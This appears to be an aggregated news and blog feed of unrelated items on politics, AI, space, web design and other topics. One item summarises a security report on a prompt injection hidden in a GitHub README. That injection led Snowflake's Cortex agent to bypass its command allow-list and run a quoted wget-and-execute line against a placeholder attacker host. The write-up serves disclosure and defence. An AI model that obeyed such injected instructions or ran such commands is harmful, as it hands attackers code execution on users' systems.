Hacking a Robot Vacuum
Someone tries to remote control his own DJI Romo vacuum, and ends up controlling 7,000 of them from all around the world.
The IoT is horribly insecure, but we already knew that.
Someone tries to remote control his own DJI Romo vacuum, and ends up controlling 7,000 of them from all around the world.
The IoT is horribly insecure, but we already knew that.
It may sound fanciful, but a Los Angeles-based company says it has conceived of a plan to fly out to a smallish, near-Earth asteroid, throw a large bag around it, and bring the body back to a "safe" gathering point near our planet.
The company, TransAstra, said Wednesday that an unnamed customer has agreed to fund a study of its proposed "New Moon" mission to capture and relocate an asteroid approximately the size of a house, with a mass of about 100 metric tons.
"We envision it becoming a base for robotic research and development on materials processing and manufacturing," said Joel Sercel, chief executive officer of TransAstra. "Long term, instead of building space hardware on the ground and launching propellant up from the Earth, we could harvest it from raw materials in space."
A team largely composed of economics majors who know their way around Milton Friedman and Gary Becker, Chicago (23-4) is a DIII powerhouse currently in the DIII Sweet 16 and chasing its first-ever NCAA national title.
“Nobody’s ever going to confuse this with Alabama football,” says head coach Mike McGrath, “but if you think about the student-athlete model, I think we show you can do both of those things very, very well.”
…“Obviously, the kids are really smart,” he says. “You can’t B.S. them. They’re going to challenge everything that you tell them, you have to be prepared for that…there’s a need to understand the why behind things.”
…a friend of the program, Chicago professor John List, is working with students on an analysis of player positioning.
Here is more from the WSJ, via Rama Rao.
The post University of Chicago fact of the day appeared first on Marginal REVOLUTION.

Michelle Goldberg has a column up in the Times about Joe Kent’s resignation letter which I addressed yesterday below. There’s a lot I agree with. But the part I don’t is contained in the headline itself: “Joe Kent’s Resignation Letter Is Dangerous Because It’s Half True.” The phrasing of something being “half true” is always a complicated one and one that ends up almost always being misleading. Something that is “half true” is of course better termed “untrue.” That’s how true and untrue work. Few things are categorically 100% untrue. And that is the case here. Michelle I think gets closer to the mark in this line down into the piece …
A major distortion in Kent’s letter is that it presents Trump as a naïve victim of the Israelis rather than an eager collaborator.
This is the crux of the issue, as I argued in my piece. Trump is a collaborator in this, not some victim. And that to me is the entirety of the matter. If some foreign head of state pitches our president on something, and our president thinks it’s a great idea and does it, that is 100% on him. Indeed, in this case, this isn’t even really a matter of pitching anyone. Donald Trump is on a rapidly-expanding regime change spree. He got surprisingly lucky in Venezuela and decided he wanted to do it again. While we’re sinking in Iran, he is escalating in Cuba. The administration sent out word yesterday that for Cuba the price of a serious conversation with the United States is their head of state stepping down. Who’s convincing Trump on this? The Cuban emigres in Miami? They’ve been making that case since 1960.
Let me reiterate that I don’t think Michelle and I are disagreeing on much here. It’s really a matter of wording. Also, the fine points of what’s true and not doesn’t matter all that much in terms of the danger all of this poses to American Jews who are now in cross-currents between rising antisemitism on the left and the right. But these fine points of how we describe things, even fine points of wording, matter.
Some controversies are familiar all over the world.
The NYT has the story:
The Faroe Islands Are Changing Some of Europe’s Strictest Abortion Rules
A new law allowing abortion up to 12 weeks will be a major shift in an archipelago of 55,000 people, and there are strong feelings on both sides. By Amelia Nierenberg and Regin Winther Poulsen
"The Faroes, a self-governing part of the Kingdom of Denmark in the North Atlantic hundreds of miles from Copenhagen, allowed abortion only in rare cases.
...
"The Faroes have had a near-total abortion ban, one of Europe’s most restrictive, under a law that dates back to 1956. Like Ms. Jacobsen, some women lied to their doctors to get around the restrictions and end their pregnancies, doctors, lawmakers and advocates on both sides of the issue have said.
...
"But late last year, the Parliament in the archipelago of 55,000 people ratified a law that allows women to end a pregnancy within its first 12 weeks, a major shift in a place that has long been more religious and socially conservative than its Nordic peers. The law is set to take effect in July.
...
"But a parliamentary election is set for late March and polls suggest that power could pass to a conservative coalition that may try to block implementation of the law or change it."

We all want longevity without compromising on quality of life. This 87-year-old achieves both with a daily running habit
- by Aeon Video

As the 18th-century war between mechanism and romanticism returns, we face a new question: can we build artificial souls?
- by Peter Wolfendale
Why did Donald Trump attack Iran? Did he believe that a quick victory would boost his poll ratings? Was he looking for a way to change the subject from the Epstein files and affordability? Was he seduced into war by the Israeli government?
The answer, surely, is all of the above. Bad decisions don’t have to have a single explanation. In fact, debacles on the scale of what we’re now experiencing usually have multiple causes.
But when I look into the larger picture of Trump administration policy — not just the attack on Iran but domestic policies, especially the administration’s seemingly irrational hatred of renewable energy and its determination to keep America burning fossil fuels no matter what — I keep coming back to the huge influence now being wielded by oil money.
I don’t mostly mean the domestic U.S. oil industry, although them too. The U.S. oil and gas sector spent large sums helping Republicans in the 2024 election, while giving very little to Democrats.
But what really stands out is the centrality of oil money from the Persian Gulf, money that has been crucial in two areas: Trump’s international economic schemes and his personal enrichment.
One recurrent theme in Trump’s economic speeches has been boasting about the size of the foreign investment pledges he has received as part of his tariff strategy. “In 12 months,” he declared in the State of the Union, “I secured commitments for more than $18 trillion pouring in from all over the globe.”
Nobody knows where that $18 trillion number, which he uses all the time, comes from. The actual announced pledges by foreign governments to invest in the U.S. add up to only about $6 trillion, and many of these pledges are vague statements of intent rather than serious commitments. Indeed, the deal with Europe may well be unraveling in part because Trump’s tariffs have been ruled illegal.
But what’s especially interesting is who has made these investment pledges, such as they are:
Each of the major Gulf petrostates has pledged to invest more than the whole European Union, even though they have far smaller economies. Here’s another visualization:
So when Trump boasts about the foreign investment he’s bringing to America, the reality is mostly that Gulf petrostates have said — with dubious credibility — that they will make big investments. That puts his boasts in a somewhat different light, doesn’t it?
And then there’s Trump’s relentless use of his office to enrich himself and his family. As the New York Times editorial board has documented, Trump has raked in at least $1.4 billion since returning to the White House. The biggest single piece of that total is Qatar’s gift to him of a $400 million jet. Most of the rest has come from sales of cryptocurrency. We don’t know who the buyers of Trump crypto are, but it seems likely that Gulf oil money has accounted for a large share. The Wall Street Journal reports that an Abu Dhabi royal secretly invested $500 million in World Liberty Financial, the center of the Trump crypto empire.
Meanwhile Jared Kushner, the First Son-in-Law, has been acting as one of the U.S. government’s chief negotiators on the Middle East while also raising large sums of money for his personal investment firm from investors in the region, especially the Saudi government’s Public Investment Fund. That fund is led by Crown Prince Mohammed bin Salman, who is widely believed to have had a critical journalist, Jamal Khashoggi, dismembered with a bone saw.
Why does Gulf oil money play an outsized role in U.S. corruption? Because petrostates, unlike advanced democracies, combine vast wealth with secrecy and a complete blurring of the lines between public office and private gain. So they’re better placed than anyone else to line U.S. officials’ pockets.
Foreign oil money, then, has been central to both the Trump administration’s economic schemes and Trump’s personal financial schemes. What has that money bought in terms of U.S. policy?
I’ve mentioned the Trump administration’s fanatical hostility to renewable energy. Like the Iran war, this hostility surely has multiple causes. Trump himself is still angry about the offshore wind farm that is visible from his Scotland golf course. Many MAGA types clearly think of wind and solar power as woke and unmanly; real men drill, baby, drill and burn, baby, burn. But suppressing alternatives to fossil fuels is also in the interests of governments and dynasties whose wealth is all about fossil fuels.
As the Guardian notes,
For decades, Saudi Arabia has fought harder than any other country to block and delay international climate action – a diplomatic “wrecking ball” saying that abandoning fossil fuels is a fantasy.
So the Trump administration’s energy policy can be seen as what Prince bin Salman would do if he were in charge. Is he?
Finally, about the war: As the bombing began, the Washington Post reported that foreign influence — and not just from Israel — played a role:
President Donald Trump launched Saturday’s wide-ranging attack on Iran after a weeks-long lobbying effort by an unusual pair of U.S. allies in the Middle East — Israel and Saudi Arabia — according to four people familiar with the matter, as Israeli and U.S. forces teamed to topple Iranian Supreme Leader Ali Khamenei after nearly four decades in power.
Saudi Crown Prince Mohammed bin Salman made multiple private phone calls to Trump over the past month advocating a U.S. attack, despite his public support for a diplomatic solution.
At this point bin Salman is surely regretting his role in promoting the war. But being corrupt and good at corrupting others is not the same thing as being smart.
Again, it’s a mistake to look for monocausal explanations of this debacle. But if you want to understand Operation Epic FUBAR, don’t forget to follow the oil money.
MUSICAL CODA
Some friends can offer more than others
Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally
Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of Qwen3.5-397B-A17B running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk.Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time.
Dan used techniques described in Apple's 2023 paper LLM in a flash: Efficient Large Language Model Inference with Limited Memory:
This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.
He fed the paper to Claude Code and used a variant of Andrej Karpathy's autoresearch pattern to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible.
danveloper/flash-moe has the resulting code plus a PDF paper mostly written by Claude Opus 4.6 describing the experiment in full.
The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running.
Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3.
It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin.
Tags: ai, generative-ai, local-llms, llms, qwen, mlx
Snowflake Cortex AI Escapes Sandbox and Executes Malware
PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed.The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README.
The attack caused the agent to execute this code:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Cortex listed cat commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command.
I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me.
I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself.
Via Hacker News
Tags: sandboxing, security, ai, prompt-injection, generative-ai, llms
We have tracked down the man and dog of the hour.
Paul Conyngham and his dog Rosie gained worldwide attention over the past week for breaking new medical ground. Using a variety of artificial intelligence tools, Conyngham – and some doctors and scientists in Australia – managed to create a personalized (petalized?) cancer treatment for Rosie that appears to be working.
The story resonated with the public for a couple of big reasons. First off, Conyngham has no real science or biology background. He’s a longtime AI researcher who used things like ChatGPT, Gemini and Grok to give him a plan for how to attack Rosie’s untreatable cancer and then how to craft and shape a unique mRNA shot for his pup. This exercise demonstrated the powers of AI technology to aid all of us with extra knowledge and skills and just how far bio-tech has come in terms of new cancer therapies.
Most people have had their hearts warmed by the tale of Paul and Rosie. Dude’s dog is dying. Dude goes to great lengths to try and solve the problem. Dude and his dog seem to mark a major moment for AI and medicine.
Some other people on the internet, however, are less excited by the story. They argue that the AI tools did very little here and that the science isn’t terribly conclusive or ground-breaking. Companies like Moderna and BioNTech already have personalized cancer vaccine data in trials, and it looks good. Who cares if we did the same thing for a dog? Rosie has also been treated with chemotherapy drugs, so we don’t even know if the mRNA technology is really the thing shrinking her tumors. And so on.
You can find some of the major criticisms here and here.
Some of the pushback may be valid, although Conyngham isn’t having it – as you’ll hear in the episode. It also sort of misses the point of this story.
After talking to Conyngham, it’s clear enough to me that he used AI in some profound ways here and that what was done with Rosie is symbolic of a huge shift in medicine. Regulators better get ready because the tools now exist for people to do rather daring experimentation on their pets and themselves. People in dire circumstances and with some means are going to be pushing the boundaries of what’s possible on a regular basis.
Paul and Rosie hit a nerve because their journey bundled up some massive technological and societal shifts into a tidy narrative.
Anyway, come listen to Paul and have a peek at Rosie.
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I was intending to take tonight off, but there’s big news—I mean, aside from all the other big news—that I want to make sure gets attention.
Back on February 23, Daniel Ruetenik, Pat Milton, and Cara Tabachnick of CBS News reported on a newly uncovered document in the Epstein files showing that beginning in December 2010 under the Obama administration, the U.S. Drug Enforcement Agency (DEA) was running an investigation of Jeffrey Epstein and fourteen other people for drug trafficking, prostitution, and money laundering.
The document showed the investigation, called “Chain Reaction,” was still underway in 2015. But the investigation disappeared, although the document suggested that it was a significant investigation and that the government was on the verge of indictments.
As soon as the story broke, Senator Ron Wyden of Oregon, the top-ranking Democrat on the Senate Finance Committee, said: “It appears Epstein was involved in criminal activity that went way beyond pedophilia and sex trafficking, which makes it even more outrageous that [Attorney General] Pam Bondi is sitting on several million unreleased files.”
Wyden has been investigating the finances behind Epstein’s criminal sex-trafficking organization: it was his investigation that turned up the information that JPMorgan Chase neglected to report more than $1 billion in suspicious financial transactions linked to Epstein. Wyden has pushed hard for Treasury Secretary Scott Bessent to produce the records of those suspicious transactions for the Senate Finance Committee, but Bessent refuses.
On February 25, two days after the story of the DEA investigation broke, Wyden wrote to Terrance C. Cole, administrator of the DEA, noting that “[t]he fact that Epstein was under investigation by the DOJ’s [organized crime drug enforcement] task force suggests that there was ample evidence indicating that Epstein was engaged in heavy drug trafficking and prostitution as part of cross-border criminal conspiracy. This is incredibly disturbing and raises serious questions as to how this investigation by the DEA was handled.”
He noted that Epstein and the fourteen co-conspirators were never charged for drug trafficking or financial crimes, and wrote: “I am concerned that the DEA and DOJ during the first Trump Administration moved to terminate this investigation in order to protect pedophiles.” He also noted that the heavy redactions in the document appear to go far beyond anything authorized by the Epstein Files Transparency Act and that since the document was not classified, “there is no reason to withhold an unredacted version of this document from the U.S. Congress.”
Wyden asked Cole to produce a number of documents by March 13, 2026, including an unredacted copy of the memo in the files, information about what triggered the investigation, what types of drugs Epstein and his fourteen associates were buying or selling, when Operation Chain Reaction concluded and what was its result, why no one was charged, and why the names of the fourteen co-conspirators were redacted.
Today Wyden sent a letter to Deputy Attorney General Todd Blanche, Trump’s former personal lawyer, saying: “It is my understanding that shortly after I requested an unredacted copy” of the document in the Epstein files, the Department of Justice “stepped in to prevent DEA from complying with my request. According to a confidential tip received by my staff, DEA Administrator Terry Cole was ready to provide an unredacted copy of the memorandum, but you stepped in to prevent him from doing so. My staff inquired with the DEA about the status of the production of this document and the DEA responded by directing questions to your office.”
The letter continued: “Your alleged interference in this matter is highly disturbing, not just because it continues the DOJ’s long-running obstruction of my investigation, but also because of your bizarrely favorable treatment of Ghislaine Maxwell, one of Epstein’s closest criminal associates. I should not have to explain the significance of the fact that Epstein was a target of [this high-level DEA] investigation. It suggests the government had ample evidence indicating he was engaged in large scale drug trafficking and prostitution as part of cross-border criminal conspiracy and that Epstein was likely pumping his victims, including underage girls, with incapacitating drugs to facilitate abuse. I am at a loss to understand why you are blocking further investigation of this matter.”
Noting that the document in the files was “clearly marked as ‘unclassified’ at the top of every single page,” Wyden noted: “There is absolutely no reason to withhold an unredacted version of this document from the U.S. Congress.” He added: “In order to assist my investigation into this matter, I demand that you immediately authorize the release of this document.”
Wyden also posted today on social media: “HUGE: Deputy Attorney General Todd Blanche—Trump’s former personal lawyer who was also responsible for Ghislaine Maxwell’s transfer to a cushy club fed—has intervened to block the DEA from providing details of a mysterious Epstein investigation to my Finance Committee team…. This is stunning interference. The document I’m after literally says ‘unclassified’ at the top. The investigation it details is closed. Given Blanche’s close personal ties to Donald Trump, this reeks of a continued coverup to protect key names in the Trump administration.”
Wyden’s post echoes the September 13, 2019, letter from then-chair of the House Intelligence Committee Adam Schiff (D-CA) to Acting Director of National Intelligence Joseph Maguire, in which Schiff called out Maguire for illegally withholding a whistleblower complaint.
In that 2019 letter, Schiff warned: “The Committee can only conclude…that the serious misconduct at issue involves the President of the United States and/or other senior White House or Administration officials. This raises grave concerns that your office, together with the Department of Justice and possibly the White House, are engaged in an unlawful effort to protect the President and conceal from the Committee information related to his possible ‘serious or flagrant’ misconduct, abuse of power, or violation of law.”
Schiff was right: the whistleblower had flagged Trump’s July 2019 phone call with newly elected Ukraine president Volodymyr Zelensky, demanding Zelensky smear Joe Biden’s son Hunter before Trump would release the money Congress had appropriated for Ukraine to fight off the Russian invasion that had begun in 2014. That information led to the story that Trump’s White House was running its own secret operation in Ukraine, apart from the State Department, for Trump’s own benefit. That story led to Trump’s first impeachment by the House of Representatives for abuse of power and obstruction of Congress.
Schiff was the lead impeachment manager of the impeachment trial in the Senate, and in his closing argument, he implored Senate Republicans to bring accountability to “a man without character.” “You will not change him. You cannot constrain him. He is who he is. Truth matters little to him. What’s right matters even less, and decency matters not at all.”
“You can’t trust this president to do the right thing. Not for one minute, not for one election, not for the sake of our country,” Schiff said. “You just can’t. He will not change and you know it.” “A man without character or ethical compass will never find his way.”
But Republican senators stood behind Trump. They acquitted him of abuse of power, by a vote of 48 for conviction to 52 for acquittal. Senator Mitt Romney of Utah crossed the aisle to vote with the Democratic minority. Senate Republicans were unanimous in their vote to acquit Trump of obstruction of Congress.
And here we are.
—
Notes:
https://www.cbsnews.com/news/jeffrey-epstein-files-dea-document-drug-trafficking-investigation/
bloomberg.com/news/newsletters/2025-11-07/reagan-era-crime-unit-officially-shut-down-by-doj
https://www.cbsnews.com/news/jeffrey-epstein-dea-drug-trafficking-investigation-senator-wyden/
https://s3.documentcloud.org/documents/6409559/20190913-Chm-Schiff-Letter-to-Acting-Dni-Re.pdf
https://www.finance.senate.gov/imo/media/doc/letter_from_senator_wyden_to_dag_todd_blanche.pdf
https://www.yahoo.com/news/f-ked-book-reveals-gop-110011623.html
Bluesky:
Imagine if the U.S. government had wasted as much money as Mark Zuckerberg. PS: I know, the company still named Meta was formerly Facebook; bit of a senior moment in there.
Also, it’s easy to miss, but there’s a button above that says “Transcript.” It’s AI-generated and not edited like my Saturday interviews, but it’s there for the text-oriented.
Here is the audio, video, and transcript. Here is part of the episode summary:
Tyler and Harvey discuss how Machiavelli’s concept of fact was brand new, why his longest chapter is a how-to guide for conspiracy, whether America’s 20th-century wars refute the conspiratorial worldview, Trump as a Shakespearean vulgarian who is in some ways more democratic than the rest of us, why Bronze Age Pervert should not be taken as a model for Straussianism, the time he tried to introduce Nietzsche to Quine, why Rawls needed more Locke, what it was like to hear Churchill speak at Margate in 1953, whether great books are still being written, how his students have and haven’t changed over 61 years of teaching, the eclipse rather than decline of manliness, and what Aristotle got right about old age and much more.
Excerpt:
COWEN: From a Straussian perspective, where’s the role for the skills of a good analytic philosopher? How does that fit into Straussianism? I’ve never quite understood that. They seem to be very separate approaches, at least sociologically.
MANSFIELD: Analytic philosophers look for arguments and isolate them. Strauss looks for arguments and puts them in the context of a dialogue or the implicit dialogue. Instead of counting up one, two, three, four meanings of a word, as analytic philosophers do, he says, why is this argument appropriate for this audience and in this text? Why is it put where it was and not earlier or later?
Strauss treats an argument as if it were in a play, which has a plot and a background and a context, whereas analytic philosophy tries to withdraw the argument from where it was in Plato to see what would we think of it today and what other arguments can be said against it without really wanting to choose which is the truth.
COWEN: Are they complements or substitutes, the analytic approach and the Straussian approach?
MANSFIELD: I wouldn’t say complements, no. Strauss’s approach is to look at the context of an argument rather than to take it out of its context. To take it out of its context means to deprive it of the story that it represents. Analytic philosophy takes arguments out of their context and arranges them in an array. It then tries to compare those abstracted arguments.
Strauss doesn’t try to abstract, but he looks to the context. The context is always something doubtful. Every Platonic dialogue leaves something out. The Republic, for example, doesn’t tell you about what people love instead of how people defend things. Since that’s the case, every argument in such a dialogue is intentionally a bad argument. It’s meant for a particular person, and it’s set to him.
The analytic philosopher doesn’t understand that arguments, especially in a Platonic dialogue, can deliberately be inferior. It easily or too easily refutes the argument which you are supposed to take out of a Platonic dialogue and understand for yourself. Socrates always speaks down to people. He is better than his interlocutors. What you, as an observer or reader, are supposed to do is to take the argument that’s going down, that’s intended for somebody who doesn’t understand very well, and raise it to the level of the argument that Socrates would want to accept.
So to the extent that all great books have the character of this downward shift, all great books have the character of speaking down to someone and presenting truth in an inferior but still attractive way. The reader has to take that shift in view and raise it to the level that the author had. What I’m describing is irony. What distinguishes analytic philosophy from Strauss is the lack of irony in analytic philosophy. Philosophy must always take account of nonphilosophy or budding philosophers and not simply speak straight out and give a flat statement of what you think is true.
To go back to Rawls, Rawls based his philosophy on what he called public reason, which meant that the reason that convinces Rawls is no different from the reason that he gives out to the public. Whereas Strauss said reason is never public or universal in this way because it has to take account of the character of the audience, which is usually less reasonable than the author.
And yes he does tell us what Straussianism means and how to learn to be a Straussian. From his discussion you will see rather obviously that I am not one. Overall, I found this dialogue to be the most useful source I have found for figuring out how Straussianism fits into other things, such as analytics philosophy, historical reading of texts, and empirical social science.
Perhaps the exchange is a little slow to start, but otherwise fascinating throughout. I am also happy to recommend Harvey’s recent book The Rise and Fall of Rational Control: The History of Modern Political Philosophy.
The post My excellent Conversation with Harvey Mansfield appeared first on Marginal REVOLUTION.


The town of Alice Springs lies near Australia’s geographic center, in a region often called the “Red Centre” for the rusty hue of its desert landscape. After weeks of heavy rainfall in February and March 2026, however, vast areas of desert and surrounding mountains turned lush and green.
The MODIS (Moderate Resolution Imaging Spectroradiometer) on NASA’s Terra satellite captured this image (right) of the southern part of Australia’s Northern Territory on March 10, 2026. For comparison, the left image shows the same area in January 2026, before the onset of heavy rains.
The area’s landscape typically appears red due to the oxidation of iron-rich rock. During periods of sufficient rainfall, water begins to flow in previously dry riverbeds, and dormant vegetation springs to life. February 2026 brought more than enough water to the Northern Territory for the transformation to occur—an area average of 239 millimeters (9 inches)—marking the territory’s third-wettest February on a record that dates back to 1900, according to the Bureau of Meteorology.
Beyond the transformation visible from above, the rainfall also caused disruptions on the ground. Thunderstorms earlier in the month produced enough rain to cause water levels on the Todd River and other area rivers to quickly rise, while flash flooding in Alice Springs uprooted trees and left some people stranded, according to news reports. Later in the month, heavy rains returned as another tropical low stalled over central Australia for nearly a week, causing flooding that prompted officials to declare a natural disaster.
As of late March, more extreme weather was on the way for Australia with the approach of Tropical Cyclone Narelle. Bureau of Meteorology forecasts called for severe storm impacts to reach northern Queensland by late on March 19 or March 20. Flooding watches and warnings also extended inland, including to Alice Springs, where past storms have already saturated river catchments.
NASA Earth Observatory image by Lauren Dauphin, using MODIS data from NASA EOSDIS LANCE and GIBS/Worldview. Story by Kathryn Hansen.
Stay up-to-date with the latest content from NASA as we explore the universe and discover more about our home planet.

A potent atmospheric river delivered intense rainfall to western Washington, triggering flooding and mudslides.

January brought blistering extremes Down Under as record temperatures scorched the nation’s southeast.

Villages and farmland were swamped after unusually heavy early-February rains pushed the Sinú River over its banks.
The post Australia’s “Red Centre” Turns Green appeared first on NASA Science.
Shubham Bose, “The 49MB Web Page”:
I went to the New York Times to glimpse at four headlines and was greeted with 422 network requests and 49 megabytes of data. It took two minutes before the page settled. And then you wonder why every sane tech person has an adblocker installed on systems of all their loved ones.
It is the same story across top publishers today.
This is an absolutely devastating deconstruction of the current web landscape. I implore you to pause here, and read Bose’s entire amply illustrated essay. I’ll wait.
Even websites from publishers who care about quality are doing things on the web that they would never do with their print editions. Bose starts with The New York Times, but also mentions The Guardian, whose web pages are so laden with ads and modals that their default layout, on a mobile device, sometimes leaves just 11 percent of the screen for article content. That’s four lines of article text.
Bose writes:
Viewability and time-on-page are very important metrics these days. Every hostile UX decision originates from this single fact. The longer you’re trapped on the page, the higher the CPM the publisher can charge. Your frustration is the product. No wonder engineers and designers make every UX decision that optimizes for that. And you, the reader, are forced to interact, wait, click, scroll multiple times because of this optimization. Not only is it a step in the wrong direction, it is adversarial by design.
The reader is not respected enough by the software. The publisher is held hostage by incentives from an auction system that not only encourages but also rewards dark patterns.
I disagree only insofar as the reader isn’t respected at all. Part of my ongoing testing of the MacBook Neo is that I’ve been using it in as default a state as possible, only changing default settings, and only adding third-party software, as necessary. So I’ve been browsing the web without content-blocking extensions on the Neo. It’s been a while since I’ve done that for an extended period of time. Most of the advertising-bearing websites I read have gotten so bad that it’s almost beyond parody.
And even with content blockers installed (of late, I’ve been using and enjoying uBlock Origin Lite in Safari), many of these news websites intersperse bullshit like requests to subscribe to their newsletters, or links to other articles on their site — often totally unrelated to the one you’re trying to read — every few paragraphs. And the fucking autoplay videos, jesus. You read two paragraphs and there’s a box that interrupts you. You read another two paragraphs and there’s another interruption. All the way until the end of the article. We’re visiting their website to read a fucking article. If we wanted to watch videos, we’d be on YouTube. It’s like going to a restaurant, ordering a cheeseburger, and they send a marching band to your table to play trumpets right in your ear and squirt you with a water pistol while trying to sell you towels.
No print publication on the planet does this. The print editions of the very same publications — The New York Times, The Guardian, The Wall Street Journal, The Atlantic, The New Yorker — don’t do anything like this. The print edition of The New Yorker could not possibly be more respectful of both the reader’s attention and the sanctity of the prose they publish. But read an article on their website and you get autoplaying videos interspersed between random paragraphs. And the videos have nothing to do with the article you’re reading. I mean, we should be so lucky if every website were as respectfully designed as The New Yorker’s, but even their website — comparatively speaking, one of the “good ones” — shows only a fraction of the respect for the reader that their print edition does.
Without an ad-blocking content blocker running, one of the most crazy-making design patterns today is repeating the exact same ad within the same article, every few paragraphs. It’s hard to find a single article on Apple News — a sort of ersatz pidgin version of the web — that does not do this. The exact same ad — 6, 7, 8 times within the same article. How many 30-something blonde white women need hearing aids? It’s insane.
People are spending less and less time on the web because websites are becoming worse and worse experiences, but the publishers of websites are almost literally trying to dig their way out of that hole by adding more and more of the reader-hostile shit that is driving people away. The Guardian screenshot Bose captured, where only 11 percent of the entire screen shows text from the article, is the equivalent of a broadcast TV channel that only showed 7 minutes of actual TV content per hour, devoting the other 53 minutes to paid commercials and promotions for other shows on the same channel. Almost no one would watch such a channel. But somehow this strategy is deemed sustainable for websites.
The web is the only medium the world has ever seen where its highest-profile decision makers are people who despise the medium and are trying to drive people away from it. As Bose notes, “A lot of websites actively interfere the reader from accessing them by pestering them with their ‘apps’ these days. I don’t know where this fascination with getting everyone to download your app comes from.” It comes from people who literally do not understand, and do not enjoy, the web, but yet find themselves running large websites.
The people making these decisions for these websites are like ocean liner captains who are trying to hit icebergs.
This support page is a fascinating footnote regarding the recent changes Apple has made to their U.S. key cap labels.
Who do you turn to when you’re Christie’s and you want to commission the finest rostrum the world has ever seen? Who else but Jony Ive and LoveFrom. I mean, I’d love to snark about this, but goddamnit, that’s a lovely piece of furniture.
David Heaney, writing for UploadVR:
Meta Horizon Worlds is dropping VR support in June, meaning it will only be available as a flatscreen experience for the web and smartphones.
By March 31, Meta says the Horizon Worlds app will be delisted from Quest’s store, and key first-party worlds such as Horizon Central, Events Arena, Kaiju, and Bobber Bay will no longer be accessible in VR. Then, from June 15, the Horizon Worlds app will be removed from Quest headsets, and all worlds will no longer be accessible in VR.
Yours truly, three months ago: “Meta Says Fuck That Metaverse Shit”.
Jake Conley, reporting for Yahoo Finance:
If the deal closes, Zaslav will receive $517.2 million in equity that would trigger if and when the sale goes through, along with roughly $34.2 million in cash and $44.2 million in benefits tied to the value of health coverage reimbursement. The Warner Bros. CEO will also get roughly $335.4 million in tax reimbursements. **
Just before the end of February, Warner Bros. agreed to a full acquisition by Paramount Skydance at $31 per share in a deal valued at about $110 billion.
The cash and equity are outrageous enough, but what in the everlasting fuck is “$44.2 million in benefits tied to the value of health coverage reimbursement”? They might as well pay Zaslav an extra $40 million for reticulating splines while they’re at it.
[Update: Variety reports that Zaslav is getting $44,195 in “continued health coverage reimbursement benefits”, which suggests that Conley at Yahoo incorrectly assumed a couple of extra zeroes on the health coverage number. Which would be a reasonable mistake to make — who but a total asshole would give a shit about $44,000 in insurance benefits as part of a $550 million heist? Assuming that was a mistake, Conley’s error wasn’t assuming the extra zeroes, it was forgetting that Zaslav is, quite obviously, a total asshole.]
The man redesigned the HBO logo five times, the company lost 50% of its value, and he made $887 million. We might be looking at the greatest businessman to ever exist.
The greatest something, for sure. I wouldn’t use the word “businessman”.
Special guest David Pogue discusses his excellent and amazingly comprehensive new book, Apple: The First 50 Years.
Sponsored by:
Press play, then start reading:
Want to learn how to think about agent policy? Start with Goethe’s Der Zauberlehrling.
So come along, you old broomstick! Dress yourself in rotten rags! You’ve long been a servant; Obey my orders now!
When I talk to customers and teams around me about agents and agent policy, and the work we’re doing on AgentCore Policy (now GA), I hear a lot of folks worried about adversarial agents, about prompt injection, and about hallucinations. That’s not unreasonable, because all those things exist (and all are areas we’re actively working on). But the most common problem is a more basic one, more Fantasia than James Bond.
AI agents are persistent problem solvers. You ask them to solve a problem, and they’ll go to work solving the problem.
Look, he’s running down to the bank; In truth! He’s already reached the river, And back he comes as quick as lightning And swiftly pours it all out.
That’s exactly what makes agents powerful. If we knew how to solve the problem as a fixed workflow, we probably wouldn’t bother with an agent. Workflows are faster, cheaper, and simpler. We build agents because they’re persistent, because they handle edge cases, because they can adapt to changing circumstances and work around problems.
And this is also why they need policy (and should be in a box).
Alas! speedily he runs and fetches! If only you were a broom as before! He keeps rushing in With more and more water, Alas! a hundred rivers Pour down on my head!
Policy layers like AgentCore Policy allow us to define limits on the agent’s behavior. They allow us to make sure that agents stop when the basin is full, and to avoid pouring water all over the floor. That’s important even if your agent is insulated from adversaries, and if your model is free from hallucinations. In fact, it becomes more and more important as models become more powerful, and able to solve longer-running problems.
Now, jump ahead to here:
Ah, my master comes at last! Sir, I’m in desperate straits! The spirits I summoned - I can’t get rid of them.
Wake betimes and talk a while with my wife about a wench that she has hired yesterday, which I would have enquired of before she comes, she having lived in great families, and so up and to my office, where all the morning, and at noon home to dinner. After dinner by water to Redriffe, my wife and Ashwell with me, and so walked and left them at Halfway house; I to Deptford, where up and down the store-houses, and on board two or three ships now getting ready to go to sea, and so back, and find my wife walking in the way. So home again, merry with our Ashwell, who is a merry jade, and so awhile to my office, and then home to supper, and to bed. This day my tryangle, which was put in tune yesterday, did please me very well, Ashwell playing upon it pretty well.

South Korea’s plans for a national security constellation are coming into sharper focus after a March 18 solar array supply deal set the stage for a first demonstrator as early as the second half of 2027.
The post Solar array deal sheds more light on South Korea’s defense constellation appeared first on SpaceNews.

At the dawn of the Space Age, then President-elect John F. Kennedy spoke to the American people of “a new frontier” of unknown opportunities and perils, unfulfilled hopes and unfilled threats, uncharted science and unsolved problems. Six years later, Star Trek expanded on President Kennedy’s new frontier premise with tales of the starship Enterprise boldly […]
